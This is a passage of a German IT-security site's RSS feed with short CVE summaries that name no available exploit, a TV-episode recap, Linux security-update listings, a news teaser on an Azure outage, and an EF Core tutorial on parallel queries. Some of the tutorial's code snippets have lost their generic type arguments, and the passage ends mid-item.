<title><![CDATA[CVE-2022-40304 | Apple tvOS up to 16.1.1 libxml2 xml external entity reference (HT213535 / EUVD-2022-43601)]]></title>
<description><![CDATA[A vulnerability was found in Apple tvOS up to 16.1.1. It has been rated as critical. Affected by this issue is some unknown functionality of the component libxml2. Performing a manipulation results in xml external entity reference.

This vulnerability was named CVE-2022-40304. The attack may be i...]]></description>
<link>https://tsecurity.de/de/3692809/sicherheitsluecken/cve-2022-40304-apple-tvos-up-to-1611-libxml2-xml-external-entity-reference-ht213535-euvd-2022-43601/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692809/sicherheitsluecken/cve-2022-40304-apple-tvos-up-to-1611-libxml2-xml-external-entity-reference-ht213535-euvd-2022-43601/</guid>
<pubDate>Sat, 25 Jul 2026 02:54:00 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/apple:tvos">Apple tvOS up to 16.1.1</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. Affected by this issue is some unknown functionality of the component <em>libxml2</em>. Performing a manipulation results in xml external entity reference.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2022-40304">CVE-2022-40304</a>. The attack may be initiated remotely. There is no available exploit.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-8314 | Rockwell Automation Arena Simulation Siman siman.exe out-of-bounds write (Nessus ID 329331)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in Rockwell Automation Arena Simulation. This affects an unknown part of the file siman.exe of the component Siman. Performing a manipulation results in out-of-bounds write.

This vulnerability was named CVE-2026-8314. The attack needs t...]]></description>
<link>https://tsecurity.de/de/3692799/sicherheitsluecken/cve-2026-8314-rockwell-automation-arena-simulation-siman-simanexe-out-of-bounds-write-nessus-id-329331/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692799/sicherheitsluecken/cve-2026-8314-rockwell-automation-arena-simulation-siman-simanexe-out-of-bounds-write-nessus-id-329331/</guid>
<pubDate>Sat, 25 Jul 2026 02:24:07 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/rockwell_automation:arena_simulation">Rockwell Automation Arena Simulation</a>. This affects an unknown part of the file <em>siman.exe</em> of the component <em>Siman</em>. Performing a manipulation results in out-of-bounds write.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-8314">CVE-2026-8314</a>. The attack needs to be approached locally. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10714 | Rockwell Automation FactoryTalk Services Platform ersion 6.60 JWT Signature Validation improper authorization (Nessus ID 329329)]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in Rockwell Automation FactoryTalk Services Platform ersion 6.60. The affected element is an unknown function of the component JWT Signature Validation. The manipulation results in improper authorization.

This vulnerability was named CVE-2026-10...]]></description>
<link>https://tsecurity.de/de/3692798/sicherheitsluecken/cve-2026-10714-rockwell-automation-factorytalk-services-platform-ersion-660-jwt-signature-validation-improper-authorization-nessus-id-329329/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692798/sicherheitsluecken/cve-2026-10714-rockwell-automation-factorytalk-services-platform-ersion-660-jwt-signature-validation-improper-authorization-nessus-id-329329/</guid>
<pubDate>Sat, 25 Jul 2026 02:24:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/rockwell_automation:factorytalk_services_platform">Rockwell Automation FactoryTalk Services Platform ersion 6.60</a>. The affected element is an unknown function of the component <em>JWT Signature Validation</em>. The manipulation results in improper authorization.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-10714">CVE-2026-10714</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-34214 | trinodb trino up to 479 removal of sensitive information (GHSA-x27p-5f68-m644)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in trinodb trino up to 479. This vulnerability affects unknown code. Performing a manipulation results in improper removal of sensitive information before storage or transfer.

This vulnerability was named CVE-2026-34214. The attack may be ...]]></description>
<link>https://tsecurity.de/de/3692795/sicherheitsluecken/cve-2026-34214-trinodb-trino-up-to-479-removal-of-sensitive-information-ghsa-x27p-5f68-m644/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692795/sicherheitsluecken/cve-2026-34214-trinodb-trino-up-to-479-removal-of-sensitive-information-ghsa-x27p-5f68-m644/</guid>
<pubDate>Sat, 25 Jul 2026 02:24:00 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/trinodb:trino">trinodb trino up to 479</a>. This vulnerability affects unknown code. Performing a manipulation results in improper removal of sensitive information before storage or transfer.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-34214">CVE-2026-34214</a>. The attack may be initiated remotely. There is no available exploit.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-65918 | PyTorch torchvision up to 0.28.0 GIF decoder read_from_tensor out-of-bounds (EUVD-2026-48341)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in PyTorch torchvision up to 0.28.0. The affected element is the function read_from_tensor of the component GIF decoder. Performing a manipulation results in out-of-bounds read.

This vulnerability was named CVE-2026-65918. The attack may be i...]]></description>
<link>https://tsecurity.de/de/3692769/sicherheitsluecken/cve-2026-65918-pytorch-torchvision-up-to-0280-gif-decoder-readfromtensor-out-of-bounds-euvd-2026-48341/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692769/sicherheitsluecken/cve-2026-65918-pytorch-torchvision-up-to-0280-gif-decoder-readfromtensor-out-of-bounds-euvd-2026-48341/</guid>
<pubDate>Sat, 25 Jul 2026 01:53:20 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/pytorch:torchvision">PyTorch torchvision up to 0.28.0</a>. The affected element is the function <code>read_from_tensor</code> of the component <em>GIF decoder</em>. Performing a manipulation results in out-of-bounds read.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-65918">CVE-2026-65918</a>. The attack may be initiated remotely. There is no available exploit.

Applying a patch is the recommended action to fix this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Silo’ Season 3, Episode 4 Recap: Bernard’s Return Changes Everything]]></title>
<description><![CDATA[Silo Season 3, Episode 4 takes Juliette deeper into Silo 18 as she escapes another attempt on her life and uncovers a secret that changes everything she thought she knew.



Warning: Major spoilers for Silo Season 3, Episode 4 follow.




Episode title: “Whatever You Do, Don’t Go Home”



Release...]]></description>
<link>https://tsecurity.de/de/3692379/ios-mac-os/silo-season-3-episode-4-recap-bernards-return-changes-everything/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692379/ios-mac-os/silo-season-3-episode-4-recap-bernards-return-changes-everything/</guid>
<pubDate>Fri, 24 Jul 2026 21:28:49 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3, Episode 4 takes Juliette deeper into Silo 18 as she escapes another attempt on her life and uncovers a secret that changes everything she thought she knew.



Warning: Major spoilers for Silo Season 3, Episode 4 follow.




Episode title: “Whatever You Do, Don’t Go Home”



Release date: July 24, 2026



Genre: Science fiction, drama and mystery



Season length: 10 episodes



Season 3 finale: September 4, 2026




Juliette escapes from Medical



The episode begins with Camille still determined to kill Juliette under the Algorithm’s instructions. Sims offers to handle the situation, although his true intentions remain difficult to understand.



Amy, the nurse caring for Juliette, turns against Camille’s plan. She sedates Emerson instead and helps Juliette escape from Medical. Amy also reveals that she had secretly replaced Juliette’s memory-suppressing medication before Juliette stopped taking the pills herself.



Amy allows the Raiders to capture her so Juliette can get away. Shirley later helps Juliette escape from Sims, believing that he plans to hurt her. However, his actions suggest that he may have been quietly helping Juliette all along.



Juliette discovers Bernard alive



Juliette asks Shirley to take her toward the sealed Digger Void. They discover that the entrance is not completely closed, allowing Juliette to continue down into a hidden section beneath the silo.



At the bottom, Juliette finds a small living area containing Bernard Holland. He is alive, heavily scarred and almost unrecognizable after the fire that supposedly killed him.



Sims previously claimed that Bernard had died and that his body had been destroyed. Bernard’s survival now raises major questions about Sims, Camille and the power struggle inside Silo 18. It also gives Juliette someone who understands the secrets behind the Algorithm and the larger silo system.



Billings investigates Orla’s murder



Elsewhere, Billings continues investigating Orla Kent’s death. He learns that rat poison did not kill her. Someone struck her with a piece of metal before hiding her body inside a closed tunnel.



Carla also disappears before she can meet Billings, while Mike and Glenda become possible suspects. The growing number of missing people suggests that someone is removing anyone connected to the silo’s hidden areas.



Daniel and Helen follow the conspiracy



In the earlier timeline, Daniel and Helen hide after discovering Steve’s damaged base and disappearance. Their only lead comes from a strange chess username that may contain a coded message.



Daniel contacts a Pentagon connection named Sam, while a government fixer pressures Helen to stop investigating. Sam eventually discovers something important, sending Daniel and Helen back into the conspiracy just before the episode ends.



Episode 4 leaves Juliette standing before one of the season’s biggest surprises. Bernard’s return can expose what Sims has been planning and reveal why Juliette’s memories were removed. What do you think Bernard will tell Juliette, and can she trust him after everything he did in previous seasons? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Dev accidentally commits Copilot binary to FreeBSD ports repo]]></title>
<description><![CDATA[Git is aptly named: it isn’t easy – but there are alternatives]]></description>
<link>https://tsecurity.de/de/3692317/it-nachrichten/dev-accidentally-commits-copilot-binary-to-freebsd-ports-repo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692317/it-nachrichten/dev-accidentally-commits-copilot-binary-to-freebsd-ports-repo/</guid>
<pubDate>Fri, 24 Jul 2026 20:49:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Git is aptly named: it isn’t easy – but there are alternatives]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-13464 | meum Kirki Plugin up to 6.0.14 on WordPress context resource injection (CNNVD-2026-59688841)]]></title>
<description><![CDATA[A vulnerability was found in meum Kirki Plugin up to 6.0.14 on WordPress and classified as problematic. This issue affects some unknown processing. The manipulation of the argument context results in improper control of resource identifiers.

This vulnerability was named CVE-2026-13464. The attac...]]></description>
<link>https://tsecurity.de/de/3692197/sicherheitsluecken/cve-2026-13464-meum-kirki-plugin-up-to-6014-on-wordpress-context-resource-injection-cnnvd-2026-59688841/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692197/sicherheitsluecken/cve-2026-13464-meum-kirki-plugin-up-to-6014-on-wordpress-context-resource-injection-cnnvd-2026-59688841/</guid>
<pubDate>Fri, 24 Jul 2026 19:36:38 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/meum:kirki_plugin">meum Kirki Plugin up to 6.0.14</a> on WordPress and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This issue affects some unknown processing. The manipulation of the argument <em>context</em> results in improper control of resource identifiers.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-13464">CVE-2026-13464</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-10697 | Progress MOVEit Transfer up to 2025.1.4/2026.0.2 improper authentication (WID-SEC-2026-2512)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Progress MOVEit Transfer up to 2025.1.4/2026.0.2. This vulnerability affects unknown code. Performing a manipulation results in improper authentication.

This vulnerability was named CVE-2026-10697. The attack may be initiated r...]]></description>
<link>https://tsecurity.de/de/3692015/sicherheitsluecken/cve-2026-10697-progress-moveit-transfer-up-to-202514202602-improper-authentication-wid-sec-2026-2512/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692015/sicherheitsluecken/cve-2026-10697-progress-moveit-transfer-up-to-202514202602-improper-authentication-wid-sec-2026-2512/</guid>
<pubDate>Fri, 24 Jul 2026 18:19:57 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/progress:moveit_transfer">Progress MOVEit Transfer up to 2025.1.4/2026.0.2</a>. This vulnerability affects unknown code. Performing a manipulation results in improper authentication.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-10697">CVE-2026-10697</a>. The attack may be initiated remotely. There is no available exploit.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in curl (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3691999/unix-server/security-mehrere-probleme-in-curl-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691999/unix-server/security-mehrere-probleme-in-curl-suse/</guid>
<pubDate>Fri, 24 Jul 2026 18:17:40 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in curl (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3691997/unix-server/security-mehrere-probleme-in-curl-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691997/unix-server/security-mehrere-probleme-in-curl-suse/</guid>
<pubDate>Fri, 24 Jul 2026 18:17:36 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (glibc, java-21-openjdk, kernel, and libpq), Debian (imagemagick, spice-vdagent, and webkit2gtk), Fedora (cryptlib, dotnet8.0, dotnet9.0, firefox, python-black, python-lsp-black, and python-pytokens), Mageia (apache, cifs-utils, dnsmasq, lrzip, and s...]]></description>
<link>https://tsecurity.de/de/3691648/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691648/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 24 Jul 2026 15:13:19 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (glibc, java-21-openjdk, kernel, and libpq), <b>Debian</b> (imagemagick, spice-vdagent, and webkit2gtk), <b>Fedora</b> (cryptlib, dotnet8.0, dotnet9.0, firefox, python-black, python-lsp-black, and python-pytokens), <b>Mageia</b> (apache, cifs-utils, dnsmasq, lrzip, and socat), <b>Oracle</b> (.NET 10.0, .NET 9.0, 389-ds-base, cups, edk2, fence-agents, firefox, freeipmi, freerdp, git-lfs, glib2, gnutls, golang, gstreamer1-plugins-bad-free, gstreamer1-plugins-good, gstreamer1-plugins-ugly-free, hplip, libinput, libvirt, libxml2, memcached, nginx, openexr, perl-DBI, perl-XML-LibXML, php, php8.4, plexus-utils, postgresql16, python3.12, python3.14, sssd, tomcat, tomcat9, unbound, vim, xorg-x11-server-Xwayland, yggdrasil, and yggdrasil-worker-package-manager), <b>Red Hat</b> (container-tools:rhel8, git-lfs, go-toolset:rhel8, golang, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, host-metering, java-1.8.0-openjdk, java-11-openjdk with Extended Lifecycle Support, java-17-openjdk, java-21-openjdk, oci-seccomp-bpf-hook, rhc, rhc-worker-playbook, skopeo, xorg-x11-server, xorg-x11-server-Xwayland, and yggdrasil), <b>Slackware</b> (mozilla-thunderbird), <b>SUSE</b> (afterburn, alloy, apache-sshd, apache2, avahi, chromium, clamav, curl, dhcpcd, dnsmasq, docker-compose, ffmpeg-7, firefox-esr, gawk, glibc, gnutls, go1.26-openssl, google-osconfig-agent, gpg2, haproxy, ImageMagick, imagemagick, jline3, jq, kernel, libgcrypt, libgnt, meson, pidgin, nmap, nodejs24, pacemaker, patch, perl-HTML-Parser, perl-libwww-perl, perl-List-SomeUtils-XS, python-aiohttp, python-WebOb, qemu, rust-keylime, SVT-AV1, libyuv0, libaom3, trivy, ucode-intel, and wireshark), and <b>Ubuntu</b> (libhttp-date-perl, libxpm, linux-azure, linux-azure-fde, pam, and rsyslog).]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-7483 | ESET Endpoint Security for macOS privileges management (EUVD-2026-48551)]]></title>
<description><![CDATA[A vulnerability was found in ESET Endpoint Security for macOS and ESET Cyber Security for macOS. It has been rated as very critical. Impacted is an unknown function. Performing a manipulation results in improper privilege management.

This vulnerability was named CVE-2026-7483. The attack needs t...]]></description>
<link>https://tsecurity.de/de/3691434/sicherheitsluecken/cve-2026-7483-eset-endpoint-security-for-macos-privileges-management-euvd-2026-48551/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691434/sicherheitsluecken/cve-2026-7483-eset-endpoint-security-for-macos-privileges-management-euvd-2026-48551/</guid>
<pubDate>Fri, 24 Jul 2026 13:43:14 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/eset:endpoint_security_for_macos">ESET Endpoint Security for macOS and ESET Cyber Security for macOS</a>. It has been rated as <a href="https://vuldb.com/kb/risk">very critical</a>. Impacted is an unknown function. Performing a manipulation results in improper privilege management.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-7483">CVE-2026-7483</a>. The attack needs to be approached locally. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Bad Brains: Azure Five Hour Outage Was Microsoft AI Demonstration]]></title>
<description><![CDATA[Microsoft spent early July marketing AI as the thing that keeps Azure running. That’s right, get ready to blame AI when Azure goes down. CTO Mark Russinovich introduced the awkwardly named Brain, an AIOps system described as a “digital twin” of Azure’s own health, credited with powering deploymen...]]></description>
<link>https://tsecurity.de/de/3691205/it-security-nachrichten/bad-brains-azure-five-hour-outage-was-microsoft-ai-demonstration/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691205/it-security-nachrichten/bad-brains-azure-five-hour-outage-was-microsoft-ai-demonstration/</guid>
<pubDate>Fri, 24 Jul 2026 11:58:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft spent early July marketing AI as the thing that keeps Azure running. That’s right, get ready to blame AI when Azure goes down. CTO Mark Russinovich introduced the awkwardly named Brain, an AIOps system described as a “digital twin” of Azure’s own health, credited with powering deployment safeguards and outage declaration, and billed as … <a href="https://www.flyingpenguin.com/bad-brains-azure-five-hour-outage-was-microsoft-ai-demonstration/" class="more-link">Continue reading <span class="screen-reader-text">Bad Brains: Azure Five Hour Outage Was Microsoft AI Demonstration</span> <span class="meta-nav">→</span></a>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to execute queries in parallel using EF Core]]></title>
<description><![CDATA[EF Core is Microsoft’s flagship ORM (object-relational mapper), the software layer that allows .NET developers to work with relational databases. The DbContext class is the core component of the EF Core framework for managing database operations. However, the DbContext class in EF Core is not thr...]]></description>
<link>https://tsecurity.de/de/3691080/ai-nachrichten/how-to-execute-queries-in-parallel-using-ef-core/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691080/ai-nachrichten/how-to-execute-queries-in-parallel-using-ef-core/</guid>
<pubDate>Fri, 24 Jul 2026 11:04:59 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">EF Core is Microsoft’s flagship ORM (object-relational mapper), the software layer that allows .NET developers to work with relational databases. The <code>DbContext</code> class is the core component of the EF Core framework for managing database operations. However, the <code>DbContext</code> class in EF Core is not thread-safe. Hence, if you share <code>DbContext</code> instances between multiple threads, you will often encounter data corruption issues and the <code>InvalidOperationException</code>.</p>



<p class="wp-block-paragraph">In this article, we’ll learn how we can execute queries in parallel in EF Core by handling thread-safety issues to avoid concurrency errors. To work with the code examples provided in this article, you should have Visual Studio 2026 installed in your system. You can <a href="https://visualstudio.microsoft.com/insiders/">download Visual Studio 2026 here</a>.</p>



<h2 class="wp-block-heading">Executing EF Core queries in parallel – the problem</h2>



<p class="wp-block-paragraph">When working in today’s data-driven applications, you will often need to fetch data from multiple unrelated datasets. In applications that use concurrency, thread-safety is critical to guaranteeing correct execution, avoiding data corruption and race conditions, and ensuring data consistency. Let’s understand this with an example. </p>



<p class="wp-block-paragraph">Let’s say we want to populate a dashboard that displays all recently processed orders, metrics, logs, and traces, as well as your application’s performance metadata. We might write the following code. </p>



<pre class="wp-block-code"><code>public class Dashboard
{
    public List Orders { get; set; } = new();
    public Metrics Metrics { get; set; } = new();
    public List Logs { get; set; } = new();
    public List Traces { get; set; } = new();
}
public static async Task LoadDashboardAsync(ProductService productService)
{
    Task&lt;List&gt;    ordersTask  = productService.GetProcessedOrdersAsync();
    Task        metricsTask = productService.GetMetricsAsync();
    Task&lt;List&gt; logsTask    = productService.GetRecentLogsAsync();
    Task&lt;List&gt;    tracesTask  = productService.GetTracesAsync();
    await Task.WhenAll(ordersTask, metricsTask, logsTask, tracesTask);
    return new Dashboard
    {
        Orders  = await ordersTask,
        Metrics = await metricsTask,
        Logs    = await logsTask,
        Traces  = await tracesTask
    };
}
</code></pre>



<p class="wp-block-paragraph">In the preceding code snippet, there are four read operations that are executed by four different <code>Task</code> instances. Our objective is to ensure that the database round trips run in parallel instead of in sequence. We can accomplish this by using<code>Task.WhenAll</code>, which starts the four tasks, waits for every task to finish, then returns the data wrapped inside a new <code>Dashboard</code> instance.</p>



<p class="wp-block-paragraph">If we executed these queries sequentially, the user would have to wait until each query completed its execution in turn—for a total wait time equal to the sum of the times for all four queries. However, by running these queries in parallel, we reduce the wait time considerably. The user will need to wait only as long as it takes for the slowest of the four queries to complete its execution.</p>



<p class="wp-block-paragraph">However, there is a danger with the above approach. If you run multiple operations on the same <code>DbContext</code> instance, you will see an <code>InvalidOperationException</code> with the following message:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">A second operation started in this context before the previous operation was completed. This is usually caused by multiple threads using the same <code>DbContext</code> instance; instance members are not guaranteed to be thread-safe.</p>
</blockquote>



<p class="wp-block-paragraph">Databases such as SQL Server, PostgreSQL, and Oracle Database follow a request-response communication model at the connection level: a single connection can process only one command at a time. Hence, you cannot run multiple queries concurrently using the connection. If you <code>await</code> several operations using the same connection, EF Core detects the overlapping use of a non-thread-safe context and throws an <code>InvalidOperationException</code>. To run queries in parallel, you must give each task its own connection or context.</p>



<h2 class="wp-block-heading">Why DbContext isn’t thread-safe – and how to work around it</h2>



<p class="wp-block-paragraph">The <code>DbContext</code> class in EF Core is designed to manage a single unit of work. To be more precise, EF Core does not provide support for running multiple operations on the same <code>DbContext</code> instance. This design approach creates inherent challenges when you use the same <code>DbContext</code> instance across multiple threads. If <code>DbContext</code> were thread-safe, extensive locking would be required, which would degrade data access performance.</p>



<p class="wp-block-paragraph">This stateful design of <code>DbContext</code> makes it unsuitable for concurrent access patterns that involve loading, modifying, or tracking different sets of data simultaneously, because it needs to maintain the internal representation of database state.</p>



<p class="wp-block-paragraph">The <a href="https://learn.microsoft.com/en-us/ef/core/change-tracking/" data-type="link" data-id="https://learn.microsoft.com/en-us/ef/core/change-tracking/">change tracker</a> is one of the most important components of <code>DbContext</code> in EF Core. It monitors all entities loaded into memory and detects any changes made to them after they have been loaded. It keeps track of the original, current, and changed values of the entities, thereby enabling the EF Core runtime to know the current state of these entities when you call the <code>SaveChanges()</code> method on the <code>DbContext</code> instance.</p>



<p class="wp-block-paragraph">To implement thread-safety when working with DbContext, we must write our code to ensure that each concurrent operation gets its own copy of a short-lived instance. Now, we <em>could</em> accomplish this by wrapping a shared <code>DbContext</code> instance inside a thread-safe block using the <code>lock</code> keyword, so that all calls to the database take place using one and only one thread at a time. This approach is illustrated in the code snippet below. </p>



<pre class="wp-block-code"><code>using Microsoft.EntityFrameworkCore;
public class Product
{
    public int Id { get; set; }
    public string Name { get; set; } = string.Empty;
    public decimal Price { get; set; }
    public int Quantity { get; set; }
}
public class AppDbContext : DbContext
{
    public AppDbContext(DbContextOptions options) : base(options) { }
    public DbSet Products =&gt; Set();
}
</code></pre>



<p class="wp-block-paragraph">However, while the above approach gives us the thread-safety we need, it can degrade data access performance considerably. A better approach is to use <code>IDbContextFactory</code> , which creates fresh <code>DbContext</code> instances on demand. Calling its <code>CreateDbContext()</code> method is cheap and produces a fresh, isolated context every time. </p>



<p class="wp-block-paragraph">The following code snippet shows how you can register an instance of type <code>IDbContextFactory</code> as a singleton. You can safely call this code from any thread.</p>



<pre class="wp-block-code"><code>builder.Services.AddDbContextFactory(options =&gt;
    options.UseSqlServer(
        builder.Configuration.GetConnectionString("Default")));
</code></pre>



<h2 class="wp-block-heading">Executing EF Core queries in parallel – the solution</h2>



<p class="wp-block-paragraph">Now let’s see how we can put <code>IDbContextFactory</code> to work. The following code illustrates a class named <code>ProductService</code> that uses a factory to create <code>DbContext</code> instances for each scope of work.</p>



<pre class="wp-block-code"><code>public class ProductService
{
    private readonly IDbContextFactory _factory;
    public ProductService(IDbContextFactory factory)
        =&gt; _factory = factory;
    public async Task GetByIdAsync(int id)
    {
        await using var context = await _factory.CreateDbContextAsync();
        return await context.Products.FindAsync(id);
    }
    public async Task UpdateStockQuantityAsync(int id, int updateQuantity)
    {
        await using var context = await _factory.CreateDbContextAsync();
        var product = await context.Products.FindAsync(id);
        if (product is null) return;
        product.Quantity += updateQuantity;
        await context.SaveChangesAsync();
    }
}
</code></pre>



<p class="wp-block-paragraph">Note that <code>ProductService</code> has two methods, <code>GetByIdAsync</code> and <code>UpdateStockQuantityAsync</code>. An instance of the <code>DbContext</code> class is created locally in each of these methods. Now, suppose you have two threads, T1 and T2, that execute these methods concurrently. That is, thread T1 executes the <code>GetByIdAsync</code> method while thread T2 executes the <code>UpdateStockQuantityAsync</code> method. Because each of these methods is executed in isolation, they will have their own context, connection, and change-tracking information, and there will be no mutable state, so you don’t need to implement thread synchronization in either of these methods.</p>



<p class="wp-block-paragraph">Consider the following code that executes a read operation and an update operation in two separate tasks. </p>



<pre class="wp-block-code"><code>public static async Task RunMethodsInParallelAsync(ProductService productService)
{
      Task readTask = productService.GetByIdAsync(1);
      Task updateTask = productService.UpdateStockQuantityAsync(3, 5);
      await Task.WhenAll(readTask, updateTask);
      Product? product = await readTask;
 }
</code></pre>



<p class="wp-block-paragraph">The <code>Task.WhenAll</code> method runs the two tasks in parallel and waits until both have finished. The reason this approach is thread-safe, and will not create concurrency errors, is that each of these two methods creates its own <code>DbContext</code> instance internally. Therefore the read operation and the update operation use independent <code>DbContext</code> instances.</p>



<h2 class="wp-block-heading">Use DbContext pooling to reduce allocation cost</h2>



<p class="wp-block-paragraph">Although creating <code>DbContext</code> instances is not that costly, you should consider using pooled contexts in applications that require high scalability and high performance. The following code snippet shows how you can register a pooled context. </p>



<pre class="wp-block-code"><code>builder.Services.AddPooledDbContextFactory(options =&gt;
    options.UseSqlServer(connectionString));
</code></pre>



<p class="wp-block-paragraph">A call to <code>AddDbContext()</code> will register a <code>DbContext</code> instance as scoped per HTTP request. Each request will run on a different thread and each will have its own context. However, keep in mind that the default scoped registration of the <code>DbContext</code> will not always suffice.</p>



<p class="wp-block-paragraph">You will need a factory to create instances of <code>DbContext</code> when you’re using a background service, or performing some work inside a particular request, or running some business logic operation over multiple contexts.</p>



<h2 class="wp-block-heading">Key takeaways</h2>



<ul class="wp-block-list">
<li>If you use EF Core in the data access layer of your application, you must implement thread safety measures whenever you run your queries in parallel.</li>



<li>You cannot execute multiple queries in parallel in EF Core using the same <code>DbContext</code> instance.</li>



<li>The <code>IDbContextFactory</code> enables you to create a <code>DbContext</code> instance for each thread, thereby enabling you to work with these instances in isolation.</li>



<li>Although using a <code>DbContext</code> pool involves a small allocation overhead, it becomes a non-issue if you need high throughput.</li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-12877 | Project Management, Bug and Issue Tracking Plugin up to 5.0.x on WordPress Issue-Tracker Configuration improper authentication]]></title>
<description><![CDATA[A vulnerability was found in Project Management, Bug and Issue Tracking Plugin up to 5.0.x on WordPress. It has been classified as critical. This affects an unknown function of the component Issue-Tracker Configuration. Performing a manipulation results in improper authentication.

This vulnerabi...]]></description>
<link>https://tsecurity.de/de/3690930/sicherheitsluecken/cve-2026-12877-project-management-bug-and-issue-tracking-plugin-up-to-50x-on-wordpress-issue-tracker-configuration-improper-authentication/</link>
